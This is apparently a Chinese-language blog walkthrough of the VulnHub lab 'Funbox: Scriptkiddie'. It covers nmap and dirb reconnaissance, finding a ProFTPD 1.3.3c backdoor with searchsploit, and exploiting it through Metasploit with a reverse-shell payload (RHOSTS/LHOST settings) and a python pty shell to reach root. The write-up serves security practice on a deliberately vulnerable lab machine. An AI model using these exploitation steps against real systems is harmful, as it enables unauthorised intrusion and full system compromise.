靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

一、环境搭建

靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub

百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9

二、信息收集

1.nmap命令扫描靶机

先用ifconfig查看kali的IP,因为kali和靶机都是NAT模式下,所以用 nmap 192.168.101.0/24 扫描得到靶机ip

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第1张图片

再使用命令查看靶机开放的端口和协议:nmap -sV -A 192.168.101.112

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第2张图片

2.利用扫描到端口

(1)开放21、22、80等端口,先访问80端口吧

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第3张图片

(2)进行目录探测,看看他有没有给我们一些提示:dirb http://192.168.101.112

(3)发现利用WordPress网站这条路行不通

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第4张图片

3.SearchSploit漏洞查找工具

(1)利用21端口,在kali输入:searchsploit ProFTPD 1.3.3c

发现可以利用的后门代码

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第5张图片

三、渗透

msfconsole框架

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第6张图片

1.搜索proFTPD 1.3.3c可利用的脚本:search ProFTPD 1.3.3c

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第7张图片

2.使用该脚本:use exploit/unix/ftp/proftpd_133c_backdoor

3.查看需要设置的参数:show options

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第8张图片

4.设置RHOSTS(靶机):set RHOSTS 192.168.101.112

5.查看一下payloads的脚本:show payloads

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第9张图片

使用反向6.链接的脚本:set payloads 3

查看要设置参数:show options

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第10张图片

7.设置LHOST(攻击机): set LHOST 192.168.101.10

8.使用run开启攻击:

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第11张图片

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

9.进入到root,发现了一个flag文件

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie_第12张图片

你可能感兴趣的:(#,靶机练习,安全,linux,运维)